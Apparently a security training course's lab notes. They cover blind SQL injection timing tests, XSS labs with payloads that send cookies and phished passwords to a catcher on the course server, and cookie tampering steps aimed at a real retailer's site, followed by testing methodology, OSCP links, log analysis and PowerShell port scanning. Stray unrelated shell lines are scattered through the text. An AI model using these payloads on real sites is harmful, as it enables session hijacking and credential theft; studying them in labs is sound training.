http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'--  (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
 
B - 2nd Character
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
 
O - 3rd Character
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'--   Ok, good it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--      
http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'--      Ok, good it waited for 10 seconds
 
-----------------------------------------------------------------------
 
 
 
 
 
 
 
################################
# Playing with session cookies #
################################
 
-----------------------------------------------------------------------
Step 1: Browse to NewEgg.com
-------------------------Paste this into Firefox-----------------------------------
https://secure.newegg.com/
----------------------------------------------------------------------------------
 
 
Step 2: Browse to the shopping cart page NewEgg.com
-------------------------Paste this into Firefox-----------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
----------------------------------------------------------------------------------
 
 
Step 3: View the current session ID
-------------------------Paste this into Firefox-----------------------------------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------
 
Step 4: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------
 
 
Step 5: Now let's modify the session ID
-------------------------Paste this into Firefox-----------------------------------
javascript:void(document.cookie="PHPSessionID=wow-this-is-fun")
------------------------------------------------------------------------------------
 
 
 
Step 6: Go back to the shopping cart page (click the back button)
---------------------------------------------------------------------------------
https://secure.newegg.com/Shopping/ShoppingCart.aspx?Submit=view
---------------------------------------------------------------------------------
 
 
 
Step 7: View the current session ID
-------------------------Paste this into Firefox-----------------------------------
javascript:void(document.write(document.cookie))
------------------------------------------------------------------------------------
 
-----------------------------------------------------------------------
 
###########################################
# What is XSS                             #
# http://45.63.104.73/2-Intro_To_XSS.pptx #
###########################################
 
OK - what is Cross Site Scripting (XSS)
 
1. Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------
 
   http://45.63.104.73/xss_practice/
-----------------------------------------------------------------------
 
   A really simple search page that is vulnerable should come up.
 
 
 
 
2. In the search box type:
---------------------------Type This-----------------------------------
 
   <script>alert('So this is XSS')</script>
-----------------------------------------------------------------------
 
 
   This should pop-up an alert window with your message in it proving XSS is in fact possible.
   Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
 
 
3. In the search box type:
---------------------------Type This-----------------------------------
 
   <script>alert(document.cookie)</script>
-----------------------------------------------------------------------
 
 
   This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
   Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
 
4. Now replace that alert script with:
---------------------------Type This-----------------------------------
 
   <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
-----------------------------------------------------------------------
 
 
This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
 
 
5. Now view the stolen cookie at:
---------------------------Type This-----------------------------------
 
   http://45.63.104.73/xss_practice/cookie_stealer_logs.html
-----------------------------------------------------------------------
 
 
The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
 
 
 
 
 
 
############################
# A Better Way To Demo XSS #
############################
 
 
Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
 
 
Use Firefox to browse to the following location:
---------------------------Type This-----------------------------------
 
   http://45.63.104.73/xss_practice/
-----------------------------------------------------------------------
 
 
 
Paste this in the search box
----------------------------
 
 
---------------------------Type This-----------------------------------
 
<script>
password=prompt('Your session is expired. Please enter your password to continue',' ');
document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
</script>
-----------------------------------------------------------------------
 
 
Now view the stolen cookie at:
---------------------------Type This-----------------------------------
 
   http://45.63.104.73/xss_practice/passwords.html
 
-----------------------------------------------------------------------

###############################################################
# Question 1: What is the process that you use when you test? #
###############################################################
 
Step 1: Automated Testing
 
Step 1a: Web Application vulnerability scanners
-----------------------------------------------
- Run two (2) unauthenticated vulnerability scans against the target
- Run two (2) authenticated vulnerability scans against the target with low-level user credentials
- Run two (2) authenticated vulnerability scans against the target with admin privileges
 
The web application vulnerability scanners that I use for this process are (HP Web Inspect, and Acunetix).
 
A good web application vulnerability scanner comparison website is here:
http://sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html
 
 
Look to see if there are cases where both scanners identify the same vulnerability. Investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
 
When you run into cases where one (1) scanner identifies a vulnerability that the other scanner does not you should still investigate these cases thoroughly, ensure that it is NOT a false positive, and report the issue.
 
 
Be sure to look for scans that take more than 3 or 4 hours as your scanner may have lost its active session and is probably not actually finding real vulnerabilities anymore.
 
 
Also, be sure to save the scan results and logs. I usually provide this data to the customer.
 
 
 
Step 1b: Directory Brute Forcer
cd ~

I like to run DirBuster or a similar tool. This is great to find hidden gems (backups of the website, information leakage, unreferenced files, dev sites, etc).
cd ~/pcap_analysis/prads

 
 
Step 2: Manual Testing
 
Try to do this step while your automated scans are running. Use Burp Suite or the Tamper Data Firefox extension to browse EVERY PAGE of the website (if this is realistic).
 
Step 2a: Spider/Scan the entire site with Burp Suite
Save the spider and scan results. I usually provide this data to the customer as well.
 
 
Step 2b: Browse through the site using the 3 question method
Have Burp Suite on with intercept turned off. Browse the website using the 3 question method that I've taught you in the past. When you find a place in the site where the answer to one of the 3 questions is yes - be sure to look at that individual web request in the target section of Burp Suite, right-click on that particular request and choose 'Send to Intruder'.
 
Take the appropriate fuzz list from https://github.com/fuzzdb-project/fuzzdb/ and load it into Intruder. A quick tip for each individual payload is to be sure to send the payload both with and without the parameter value.
 
Here is what I mean:
http://www.site.com/page.aspx?parametername=parametervalue
 
When you are looking at an individual request - often times Burp Suite will insert the payload in place of the parameter value like this:
 
http://www.site.com/page.aspx?parametername=[ payload ]
 
cd ~

 
cd ~/pcap_analysis/chaos_reader/

 
This little hint will pay huge dividends in actually EXPLOITING the vulnerabilities you find instead of just identifying them.
 
 
 
 
 
 
 
###########################################
# Question 2: How much fuzzing is enough? #
###########################################
There really is no exact science for determining the correct amount of fuzzing per parameter to do before moving on to something else.
 
Here are the steps that I follow when I'm testing (my mental decision tree) to figure out how much fuzzing to do.
 
 
Step 1: Ask yourself the 3 questions per page of the site.
 
Step 2: If the answer is yes, then go down that particular attack path with a few fuzz strings (I usually do 10-20 fuzz strings per parameter)
 
Step 3: When you load your fuzz strings - use the following decision tree
 
    - Are the fuzz strings causing a default error message (example 404)?
        - If this is the case then it is most likely NOT vulnerable
 
    - Are the fuzz strings causing a WAF or LB custom error message?
        - If this is the case then you need to find an encoding method to bypass
 
 
    - Are the fuzz strings causing an error message that discloses the backend type?
cd ~/pcap_analysis/tshark

        - Some example strings that I use are:
            '
            "
            ()          <----- Take the parameter value and put it in parenthesis
            (5-1)       <----- See if you can perform an arithmetic function
 
 
    - Are the fuzz strings rendering executable code?
        - If yes, then report XSS/CSRF/Response Splitting/Request Smuggling/etc
        - Some example strings that I use are:
            <b>hello</b>
            <u>hello</u>
            <script>alert(123);</script>
            <script>alert(xss);</script>
            <script>alert('xss');</script>
            <script>alert("xss");</script>
 
 
 
#######################
# Bug Bounty Programs #
#######################
https://medium.com/bugbountywriteup/bug-bounty-hunting-methodology-toolkit-tips-tricks-blogs-ef6542301c65
 
 
------------------------------------------------------------------------

# Bug Hunter's Methodology #
############################
https://www.youtube.com/watch?v=C4ZHAdI8o1w
https://www.youtube.com/watch?v=-FAjxUOKbdI





#########################################
# Web Application Security Job Roles    #
# Application Assessor level 1          #
#########################################
Required Technical Skills: 		Comfortable with basic Linux/Windows (Linux+/MCSA)
								Comfortable with basic web application fundamentals
								Comfortable with security fundamentals (Security+)
		


Job Task: 						Run Web App security scanners and assist with documentation of Web App vulnerabilities


Tools Used:
								HP Web Inspect
    							IBM AppScan
    							AppSpider
    							Acunetix			Web App Vulnerabilities
    							Netsparker              
    							Qualys
    							
 


#########################################
# Web Application Security Job Roles    #
# Application Assessor level 2          #
#########################################
Required Technical Skills: 		Comfortable with manual web app pentesting (eWPTv1/GWAPT)
								Comfortable with basic web application programming
								Comfortable researching IT security issues
		


Job Task: 						Run Web App security scanners and assist with documentation of Web App vulnerabilities
								Perform manual vulnerability validation
								Analyze public exploit and develop threat analysis reports
								Assess simple applications for vulnerabilities


Tools Used:
								Burp Suite
    							OWASP Zap
    							Fiddler
    							Charles Proxy			Web App Vulnerabilities



#########################################
# Security Operations Center Job Roles  #
# Application Assessor level 3          #
#########################################
Required Technical Skills: 		Comfortable with manual web app pentesting (eWPTv2)
								Comfortable with manual mobile app app pentesting (eMAPT)
								Comfortable with advanced web application programming
		


Job Task: 						Run Web App security scanners and assist with documentation of Web App vulnerabilities
								Perform manual vulnerability validation
								Analyze public exploit and develop threat analysis reports
								Assess complex web apps and mobile applications for vulnerabilities


Tools Used:
								Burp Suite
    							OWASP Zap
    							Fiddler
    							Charles Proxy			Web App Vulnerabilities





-------------------------------------------------------------------------------------------------------------



                      ####################################
####################### How to prepare for the OSCP exam ################################
                      ####################################

The purpose of this class is to help students learn how to address the common issues in Hacking Challenge Lab courses.
 
 
Issue 1. Lack of a thorough attack process
==========================================
    - Host discovery  
    - Service discovery
    - Service version discovery
    - Vulnerability research
    - Linux (port 111)/Window (port 445) Enumeration
    - Webserver vulnerability scan
    - Directory brute force every webserver
    - Analyze source code of every web app (look for IPs, usernames/passwords, explanations of how stuff works)
    - Brute force all services
 


 
Issue 2. Lack of automation of the process
==========================================
	- Organize your notes and resources so you can automate your attack process:
		- https://github.com/wwong99/pentest-notes/blob/master/oscp_resources/OSCP-Survival-Guide.md
		- https://github.com/sinfulz/JustTryHarder
		- https://herrfeder.github.io/pentesting/2018/09/30/OSCP-Cheat-Sheet.html

    - Research attacks scripts on the internet to enhance your methodology
	
	- OSCP scripts
		- https://github.com/codingo/Reconnoitre
		- https://github.com/mikaelkall/massrecon
		- https://github.com/fchyla/pwk_scripts

	- Network Pentest Automation Scripts
 		- https://github.com/jmortega/europython_ethical_hacking/blob/master/NmapScannerAsync.py
		- https://github.com/1N3/Sn1per
		- https://github.com/leebaird/discover
 


Issue 3. Failing to document all steps being performed and their output
=======================================================================


 
 
Issue 4. Lack of sleep during the exam
======================================
 


 
Issue 5. Failing to reboot target machines prior to attack
==========================================================
 
 
 
--------------------------------------------------------------------------------------------------------------
 
 
A good strategy to use to prepare for the OSCP would be:
 
Step 1. Ensure that you are comfortable with Linux
--------------------------------------------------
- LinuxSurvival.com (you should be able to comfortably pass all 4 quizzes)
- Comptia Linux+ (You should be just a hair under a Linux system administrator in skill level, simple shell scripting, and well beyond a Linux user skill level)
 
You should be very comfortable with the material covered in the videos below (Go through all of them twice if you are new to Linux):
https://www.youtube.com/playlist?list=PLCDA423AB5CEC8FDB
https://www.youtube.com/playlist?list=PLtK75qxsQaMLZSo7KL-PmiRarU7hrpnwK
https://www.youtube.com/playlist?list=PLcUid3OP_4OXOUqYTDGjq-iEwtBf-3l2E
 
 
 
2. You should be comfortable with the following tools:
------------------------------------------------------
 
Nmap:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBsINfLVidNVaZ-7_v1NJIo
 
Metasploit:
https://www.youtube.com/playlist?list=PL6gx4Cwl9DGBmwvjJoWhM4Lg5MceSbsja
 
Burp Suite:
https://www.youtube.com/playlist?list=PLv95pq8fEyuivHeZB2jeC435tU3_1YGzV
 
Sqlmap:
https://www.youtube.com/playlist?list=PLA3E1E7A07FD60C75
 
Nikto:
https://www.youtube.com/watch?v=GH9qn_DBzCk
 
Enum4Linux:
https://www.youtube.com/watch?v=hA5raaGOQKQ
 
RPCINFO/SHOWMOUNT:
https://www.youtube.com/watch?v=FlRAA-1UXWQ
 
Hydra:
https://www.youtube.com/watch?v=rLtj8tEmGso
 
 
 
3. You need to comfortable with basic exploit development
---------------------------------------------------------
 
Basic assembly:
https://www.youtube.com/playlist?list=PLue5IPmkmZ-P1pDbF3vSQtuNquX0SZHpB
 
Basic exploit development (first 5 videos in the playlist):
https://www.youtube.com/playlist?list=PLWpmLW-3AVsjcz_VJFvofmIFVTk7T-Ukl
 
 
4. You need to be comfortable with privilege escalation
-------------------------------------------------------
Linux
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
 
Windows
https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/
http://www.fuzzysecurity.com/tutorials/16.html


------------------------------------------------------------------------------------------------------------------------







#######################
# Log Analysis basics #
#######################
Download this file and open it with Notepad
http://45.63.104.73/WhatHappened.txt


There are 4 steps to log analysis:

1. Reduce the noise
2. Group LIKE data
3. Rename fields to make it easier to read
4. Repeat





##############################################
# Log Analysis with Linux command-line tools #
##############################################
The following command line executables are found in the Mac as well as most Linux Distributions.
 
cat –  prints the content of a file in the terminal window
grep – searches and filters based on patterns
awk –  can sort each row into fields and display only what is needed
sed –  performs find and replace functions
sort – arranges output in an order
uniq – compares adjacent lines and can report, filter or provide a count of duplicates
 
 
##############
# Cisco Logs #
##############
 
-----------------------------Type this-----------------------------------------
wget http://45.63.104.73/cisco.log
-------------------------------------------------------------------------------
 
AWK Basics
----------
To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
 
-----------------------------Type this-----------------------------------------
cd ~/log_analysis
cat cisco.log | awk '{print $5}' | tail -n 4
-------------------------------------------------------------------------------
 
 
 
Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
 
-----------------------------Type this-----------------------------------------
cat cisco.log | awk '{print $5}'| sort | uniq -c | sort -rn
-------------------------------------------------------------------------------
 
 
 
While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
 
-----------------------------Type this-----------------------------------------
cat cisco.log | grep %[a-zA-Z]*-[0-9]-[a-zA-Z]* | awk '{print $5}' | sort | uniq -c | sort -rn
-------------------------------------------------------------------------------
 
 
 
 
Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
 
-----------------------------Type this-----------------------------------------
cat cisco.log | grep %LINEPROTO-5-UPDOWN:
 
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| awk '{print $10}' | sort | uniq -c | sort -rn
 
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10}' | sort | uniq -c | sort -rn
 
cat cisco.log | grep %LINEPROTO-5-UPDOWN:| sed 's/,//g' | awk '{print $10 " changed to " $14}' | sort | uniq -c | sort -rn
--------------------------------------------------------------------------------







If you are interested in running PowerShell on Mac OS X, or Linux you can check out the following link:
https://www.howtogeek.com/267858/how-to-install-microsoft-powershell-on-linux-or-os-x/





 
#####################
# Powershell Basics #
#####################
 
PowerShell is Microsoft's new scripting language that has been built in since the release Vista.
 
PowerShell file extension end in .ps1 .
 
An important note is that you cannot double click on a PowerShell script to execute it.
 
To open a PowerShell command prompt either hit Windows Key + R and type in PowerShell or Start -> All Programs -> Accessories -> Windows PowerShell -> Windows PowerShell. Make sure that you run it as an administrator
 
------------------------Type This------------------------------
cd c:\
dir
cd
ls
---------------------------------------------------------------
 
 
To obtain a list of cmdlets, use the Get-Command cmdlet
------------------------Type This------------------------------
Get-Command
---------------------------------------------------------------
 
 
You can use the Get-Alias cmdlet to see a full list of aliased commands.
------------------------Type This------------------------------
Get-Alias
---------------------------------------------------------------
 
 
Don't worry you won't blow up your machine with Powershell
------------------------Type This------------------------------
Get-Process | stop-process              Don't press [ ENTER ] What will this command do?
Get-Process | stop-process -whatif
---------------------------------------------------------------
 
To get help with a cmdlet, use the Get-Help cmdlet along with the cmdlet you want information about.
------------------------Type This------------------------------
Get-Help Get-Command
 
Get-Help Get-Service –online
 
Get-Service -Name TermService, Spooler
 
Get-Service –N BITS
---------------------------------------------------------------
 
 
 
 
 
- Run cmdlet through a pie and refer to its properties as $_
------------------------Type This------------------------------
Get-Service | where-object {  $_.Status -eq "Running"}
---------------------------------------------------------------
 
 
 
- PowerShell variables begin with the $ symbol. First lets create a variable
------------------------Type This------------------------------
$serv = Get-Service –N Spooler
---------------------------------------------------------------
 
To see the value of a variable you can just call it in the terminal.
------------------------Type This------------------------------
$serv
 
$serv.gettype().fullname
---------------------------------------------------------------
 
 
Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
------------------------Type This------------------------------
$serv | Get-Member
 
Get-Member -InputObject $serv
---------------------------------------------------------------
 
 
 
 
Let's use a method and a property with our object.
------------------------Type This------------------------------
$serv.Status
$serv.Stop()
$serv.Refresh()
$serv.Status
$serv.Start()
$serv.Refresh()
$serv.Status
---------------------------------------------------------------
 
 
If you want some good command-line shortcuts you can check out the following link:
https://technet.microsoft.com/en-us/library/ff678293.aspx



 
#############################
# Simple Event Log Analysis #
#############################
Let's setup a directory to work in:
------------------------Type This------------------------------
cd c:\
 
mkdir ps
 
cd ps
---------------------------------------------------------------
 
Step 1: Dump the event logs
---------------------------
The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
 
To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
------------------------Type This------------------------------
Get-EventLog -LogName application | Export-Clixml Applog.xml
 
type .\Applog.xml
 
$logs = "system","application","security"
---------------------------------------------------------------
 
 
The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
------------------------Type This------------------------------
$logs | % { get-eventlog -LogName $_ | Export-Clixml "$_.xml" }
---------------------------------------------------------------
 
 
 
 
Step 2: Import the event log of interest
----------------------------------------
To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
Store the results in a variable.
Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
 
The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
------------------------Type This------------------------------
$seclog = Import-Clixml security.xml
 
$seclog | select -Last 5
---------------------------------------------------------------
 
Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
------------------------Type This------------------------------
Get-EventLog Application -After (Get-Date).AddDays(-1)
---------------------------------------------------------------
You can use '-after' and '-before' to filter date ranges
 
One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
By default, an ordinary user does not have permission to read the security log.
 
 
I had another student ask me if we can go back in hours instead of days and the answer is yes.
------------------------Type This------------------------------
Get-EventLog Application -After (Get-Date).AddHours(-1)
---------------------------------------------------------------
 
 
 
Step 3: Drill into a specific entry
-----------------------------------
To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
 
------------------------Type This------------------------------
$seclog | select -first 1 | fl *
---------------------------------------------------------------
 
The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
 
------------------------Type This------------------------------
($seclog | select -first 1).message
 
(($seclog | select -first 1).message).gettype()
---------------------------------------------------------------
 
 
In the *nix world you often want a count of something (wc -l).
How often is the SeSecurityPrivilege privilege mentioned in the message property?
To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
------------------------Type This------------------------------
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | measure
---------------------------------------------------------------
If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
 
------------------------Type This------------------------------
$seclog | ? { $_.message -match 'SeSecurityPrivilege'} | group eventid
---------------------------------------------------------------
 
Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
Use the count property to determine the total number of entries in the event log.
------------------------Type This------------------------------
$seclog.Count
---------------------------------------------------------------
 
 
 
 
 
############################
# Simple Log File Analysis #
############################
 
 
You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
 
------------------------Type This------------------------------
cd c:\ps
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
---------------------------------------------------------------
 
 
 
The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
------------------------Type This------------------------------
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line
---------------------------------------------------------------
 
 
 
To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
------------------------Type This------------------------------
Select-String 192.168.208.63 .\CiscoLogFileExamples.txt | select line | Measure-Object
---------------------------------------------------------------
 
 
To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
------------------------Type This------------------------------
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique | Measure-Object
---------------------------------------------------------------
 
 
Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
------------------------Type This------------------------------
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select -ExpandProperty value | Sort-Object -Unique
---------------------------------------------------------------
 
In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
------------------------Type This------------------------------
Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt | select -ExpandProperty matches | select value | group value | sort count -des
---------------------------------------------------------------
 
 
 
##############################################
# Parsing Log files using windows PowerShell #
##############################################
 
Download the sample IIS log http://pastebin.com/LBn64cyA
 
------------------------Type This------------------------------
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
 
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV")}  
---------------------------------------------------------------
 
 
The above command would give us all the WebDAV requests.
 
To filter this to a particular user name, use the below command:
------------------------Type This------------------------------
Get-Content ".\*log" | ? { ($_ | Select-String "WebDAV") -and ($_ | Select-String "OPTIONS")}  
---------------------------------------------------------------
 
 
Some more options that will be more commonly required :
 
For Outlook Web Access : Replace WebDAV with OWA
 
For EAS : Replace WebDAV with Microsoft-server-activesync
 
For ECP : Replace WebDAV with ECP
 
 
 
 
 
 
 
####################################################################
# Windows PowerShell: Extracting Strings Using Regular Expressions #
####################################################################
 
 
Regex Characters you might run into:
 
^   Start of string, or start of line in a multiline pattern
$   End  of string, or start of line in a multiline pattern
\b  Word boundary
\d  Digit
\   Escape the following character
*   0 or more   {3} Exactly 3
+   1 or more   {3,}    3 or more
?   0 or 1      {3,5}   3, 4 or 5
 
 
 
To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
 
1) The input file that will be parsed
------------------------Type This------------------------------
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
---------------------------------------------------------------
2) The regular expression that the input file will be compared against
 
3) The output file for where the extracted data will be placed.
 
Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
 
To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
------------------------Type This------------------------------
$input_path = 'c:\ps\emails.txt'
$output_file = 'c:\ps\extracted_addresses.txt'
$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
---------------------------------------------------------------
 
 
In this script, we have the following variables:
 
1) $input_path to hold the path to the input file we want to parse
 
2) $output_file to hold the path to the file we want the results to be stored in
 
3) $regex to hold the regular expression pattern to be used when the strings are being matched.
 
The select-string cmdlet contains various parameters as follows:
 
1) "-Path" which takes as input the full path to the input file
 
2) "-Pattern" which takes as input the regular expression used in the matching process
 
3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
 
Using ">" the results are written to the destination specified in the $output_file variable.
 
Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
 
IP addresses
------------
For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
------------------------Type This------------------------------
$input_path = 'c:\ps\ip_addresses.txt'
$output_file = 'c:\ps\extracted_ip_addresses.txt'
$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
---------------------------------------------------------------
 
 
 
URLs
----
For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
------------------------Type This------------------------------
$input_path = 'c:\ps\URL_addresses.txt'
$output_file = 'c:\ps\extracted_URL_addresses.txt'
$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=]*)*?'
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
---------------------------------------------------------------
 
In addition to the examples above, many other types of strings can be extracted using this script.
All you need to do is switch the regular expression in the "$regex" variable!
In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
 
 
 
 
 
 
########################################
# Basic Network Commands in PowerShell #
########################################
 
Reference:
https://blogs.technet.microsoft.com/josebda/2015/04/18/windows-powershell-equivalents-for-common-networking-commands-ipconfig-ping-nslookup/
 
 
###################
# Pentester Tasks #
###################
Reference:
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
 
 
Listing IPs
-----------
One of the typical ways for working with IP addressed in most scripts is to work with an octet and then increase the last one
 
------------------------Type This------------------------------
$octect = "149.28.201."
$lastoctect = (1..255)
$lastoctect | ForEach-Object {write-host "$($octect)$($_)"}
---------------------------------------------------------------
 
 
Ping Sweep
------------------------------------------------------
PowerShell provides several methods for doing Ping
Test-Connection cmdlet
Creation of a WMI Object
.Net System.Net.NetworkInformation.Ping Object
------------------------------------------------------
 

 
Port Scans
----------
To test if a port is open on a remote host in PowerShell the best method is to use the .Net abstraction that it provides to Windows Socket library
For TCP the .Net System.Net.Sockets.TcpClient
For UDP the .Net System.Net.Sockets.UdpClient
 
 
 
 
TCP Scan (Windows 7)
--------------------
NOTE: If you are using Windows 7, use the code below
------------------------Type This------------------------------
$ports=22,80,443,3389
$target = "149.28.201.171"
foreach ($i in $ports) {
try {
$socket = new-object System.Net.Sockets.TCPClient($target, $i);
} catch {}
if ($socket -eq $NULL) {
echo "$target:$i - Closed";
} else {
echo "$target:$i - Open";
$socket = $NULL;
}}
---------------------------------------------------------------
 
 
 
TCP Scan (Windows 10)
---------------------
NOTE: If you are using Windows 10, use the code below
 
------------------------Type This------------------------------
$ports=22,80,443,3389
$target = "149.28.201.171"
foreach ($i in $ports) {
try {
$socket = new-object System.Net.Sockets.TCPClient($target, $i);
} catch {}
if ($socket -eq $NULL) {
echo "${target}:$i - Closed";
} else {
echo "${target}:$i - Open";
$socket = $NULL;
}}
---------------------------------------------------------------
 
 
 
##########################
# Parsing Nmap XML Files #
##########################
If you are NOT using the Win7 VM provided then you can get the required files for this lab which are located in this zip file:
https://infosecaddicts-files.s3.amazonaws.com/PowerShell-Files.zip
 
 
Let's setup a directory to work in:
------------------------Type This------------------------------
cd c:\
 
mkdir ps
 
